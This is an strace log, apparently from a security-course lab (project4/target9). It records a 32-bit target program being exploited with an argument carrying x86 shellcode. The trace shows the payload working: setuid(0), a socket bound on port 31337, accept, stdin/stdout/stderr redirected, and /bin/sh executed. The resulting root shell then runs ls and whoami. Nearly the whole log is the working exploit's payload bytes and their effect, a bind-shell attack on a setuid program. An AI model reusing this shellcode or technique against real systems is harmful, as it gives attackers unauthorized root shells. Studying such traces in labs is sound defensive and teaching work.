execve("./target9", ["./target9", "1\300Pj\1j\2\211\3411\333C\260f\315\200\211\3061\300Pfhzifj\2\211\341j\26"...], 0x7ffde3a78378 /* 13 vars */) = 0
strace: [ Process PID=1590 runs in 32 bit mode. ]
arch_prctl(0x3001 /* ARCH_??? */, 0xff9c3600) = -1 EINVAL (Invalid argument)
brk(NULL)                               = 0x9c3b000
brk(0x9c3bd40)                          = 0x9c3bd40
set_thread_area({entry_number=-1, base_addr=0x9c3b840, limit=0x0fffff, seg_32bit=1, contents=0, read_exec_only=0, limit_in_pages=1, seg_not_present=0, useable=1}) = 0 (entry_number=12)
uname({sysname="Linux", nodename="ad08706957ff", ...}) = 0
readlink("/proc/self/exe", "/home/ubuntu/project4/target9", 4096) = 29
brk(0x9c5cd40)                          = 0x9c5cd40
brk(0x9c5d000)                          = 0x9c5d000
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
mprotect(0x80e8000, 8192, PROT_READ)    = 0
setuid32(0)                             = 0
personality(PER_LINUX|ADDR_NO_RANDOMIZE) = 0 (PER_LINUX)
execve("./target9", ["./target9", "1\300Pj\1j\2\211\3411\333C\260f\315\200\211\3061\300Pfhzifj\2\211\341j\26"...], 0xff9c3670 /* 13 vars */) = 0
arch_prctl(0x3001 /* ARCH_??? */, 0xffffc760) = -1 EINVAL (Invalid argument)
brk(NULL)                               = 0x80ec000
brk(0x80ecd40)                          = 0x80ecd40
set_thread_area({entry_number=-1, base_addr=0x80ec840, limit=0x0fffff, seg_32bit=1, contents=0, read_exec_only=0, limit_in_pages=1, seg_not_present=0, useable=1}) = 0 (entry_number=12)
uname({sysname="Linux", nodename="ad08706957ff", ...}) = 0
readlink("/proc/self/exe", "/home/ubuntu/project4/target9", 4096) = 29
brk(0x810dd40)                          = 0x810dd40
brk(0x810e000)                          = 0x810e000
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
mprotect(0x80e8000, 8192, PROT_READ)    = 0
setuid32(0)                             = 0
socket(AF_INET, SOCK_STREAM, IPPROTO_IP) = 3
bind(3, {sa_family=AF_INET, sin_port=htons(31337), sin_addr=inet_addr("0.0.0.0")}, 22) = 0
listen(3, 5)                            = 0
accept(3, NULL, NULL)                   = 4
dup2(4, 0)                              = 0
dup2(4, 1)                              = 1
dup2(4, 2)                              = 2
execve("/bin//sh", NULL, NULL)          = 0
strace: [ Process PID=1590 runs in 64 bit mode. ]
brk(NULL)                               = 0x555555577000
arch_prctl(0x3001 /* ARCH_??? */, 0x7fffffffed60) = -1 EINVAL (Invalid argument)
access("/etc/ld.so.preload", R_OK)      = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 5
fstat(5, {st_mode=S_IFREG|0644, st_size=20718, ...}) = 0
mmap(NULL, 20718, PROT_READ, MAP_PRIVATE, 5, 0) = 0x7ffff7fc3000
close(5)                                = 0
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 5
read(5, "\177ELF\2\1\1\3\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\300A\2\0\0\0\0\0"..., 832) = 832
pread64(5, "\6\0\0\0\4\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0"..., 784, 64) = 784
pread64(5, "\4\0\0\0\20\0\0\0\5\0\0\0GNU\0\2\0\0\300\4\0\0\0\3\0\0\0\0\0\0\0", 32, 848) = 32
pread64(5, "\4\0\0\0\24\0\0\0\3\0\0\0GNU\0\7\2C\n\357_\243\335\2449\206V>\237\374\304"..., 68, 880) = 68
fstat(5, {st_mode=S_IFREG|0755, st_size=2029592, ...}) = 0
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7ffff7fc1000
pread64(5, "\6\0\0\0\4\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0"..., 784, 64) = 784
pread64(5, "\4\0\0\0\20\0\0\0\5\0\0\0GNU\0\2\0\0\300\4\0\0\0\3\0\0\0\0\0\0\0", 32, 848) = 32
pread64(5, "\4\0\0\0\24\0\0\0\3\0\0\0GNU\0\7\2C\n\357_\243\335\2449\206V>\237\374\304"..., 68, 880) = 68
mmap(NULL, 2037344, PROT_READ, MAP_PRIVATE|MAP_DENYWRITE, 5, 0) = 0x7ffff7dcf000
mmap(0x7ffff7df1000, 1540096, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 5, 0x22000) = 0x7ffff7df1000
mmap(0x7ffff7f69000, 319488, PROT_READ, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 5, 0x19a000) = 0x7ffff7f69000
mmap(0x7ffff7fb7000, 24576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 5, 0x1e7000) = 0x7ffff7fb7000
mmap(0x7ffff7fbd000, 13920, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7ffff7fbd000
close(5)                                = 0
arch_prctl(ARCH_SET_FS, 0x7ffff7fc2580) = 0
mprotect(0x7ffff7fb7000, 16384, PROT_READ) = 0
mprotect(0x555555572000, 8192, PROT_READ) = 0
mprotect(0x7ffff7ffc000, 4096, PROT_READ) = 0
munmap(0x7ffff7fc3000, 20718)           = 0
getuid()                                = 0
getgid()                                = 0
getpid()                                = 1590
rt_sigaction(SIGCHLD, {sa_handler=0x555555567c30, sa_mask=~[RTMIN RT_1], sa_flags=SA_RESTORER, sa_restorer=0x7ffff7e12090}, NULL, 8) = 0
geteuid()                               = 0
getppid()                               = 1587
brk(NULL)                               = 0x555555577000
brk(0x555555598000)                     = 0x555555598000
getcwd("/home/ubuntu/project4", 4096)   = 22
ioctl(0, TCGETS, 0x7fffffffeb60)        = -1 ENOTTY (Inappropriate ioctl for device)
geteuid()                               = 0
getegid()                               = 0
rt_sigaction(SIGINT, NULL, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
rt_sigaction(SIGINT, {sa_handler=SIG_DFL, sa_mask=~[RTMIN RT_1], sa_flags=SA_RESTORER, sa_restorer=0x7ffff7e12090}, NULL, 8) = 0
rt_sigaction(SIGQUIT, NULL, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
rt_sigaction(SIGQUIT, {sa_handler=SIG_DFL, sa_mask=~[RTMIN RT_1], sa_flags=SA_RESTORER, sa_restorer=0x7ffff7e12090}, NULL, 8) = 0
rt_sigaction(SIGTERM, NULL, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
rt_sigaction(SIGTERM, {sa_handler=SIG_DFL, sa_mask=~[RTMIN RT_1], sa_flags=SA_RESTORER, sa_restorer=0x7ffff7e12090}, NULL, 8) = 0
read(0, "ls\n", 8192)                   = 3
stat("/usr/local/sbin/ls", 0x7fffffffe9f0) = -1 ENOENT (No such file or directory)
stat("/usr/local/bin/ls", 0x7fffffffe9f0) = -1 ENOENT (No such file or directory)
stat("/usr/sbin/ls", 0x7fffffffe9f0)    = -1 ENOENT (No such file or directory)
stat("/usr/bin/ls", {st_mode=S_IFREG|0755, st_size=142144, ...}) = 0
clone(child_stack=NULL, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0x7ffff7fc2850) = 1591
--- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED, si_pid=1591, si_uid=0, si_status=0, si_utime=0, si_stime=0} ---
rt_sigreturn({mask=[]})                 = 1591
wait4(-1, [{WIFEXITED(s) && WEXITSTATUS(s) == 0}], 0, NULL) = 1591
read(0, "whoami\n", 8192)               = 7
stat("/usr/local/sbin/whoami", 0x7fffffffe9f0) = -1 ENOENT (No such file or directory)
stat("/usr/local/bin/whoami", 0x7fffffffe9f0) = -1 ENOENT (No such file or directory)
stat("/usr/sbin/whoami", 0x7fffffffe9f0) = -1 ENOENT (No such file or directory)
stat("/usr/bin/whoami", {st_mode=S_IFREG|0755, st_size=39256, ...}) = 0
clone(child_stack=NULL, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0x7ffff7fc2850) = 1592
--- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED, si_pid=1592, si_uid=0, si_status=0, si_utime=0, si_stime=0} ---
rt_sigreturn({mask=[]})                 = 1592
wait4(-1, [{WIFEXITED(s) && WEXITSTATUS(s) == 0}], 0, NULL) = 1592
read(0, "ls\n", 8192)                   = 3
clone(child_stack=NULL, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0x7ffff7fc2850) = 1593
wait4(-1, [{WIFEXITED(s) && WEXITSTATUS(s) == 0}], 0, NULL) = 1593
--- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED, si_pid=1593, si_uid=0, si_status=0, si_utime=0, si_stime=0} ---
rt_sigreturn({mask=[]})                 = 1593
read(0, "", 8192)                       = 0
exit_group(0)                           = ?
+++ exited with 0 +++
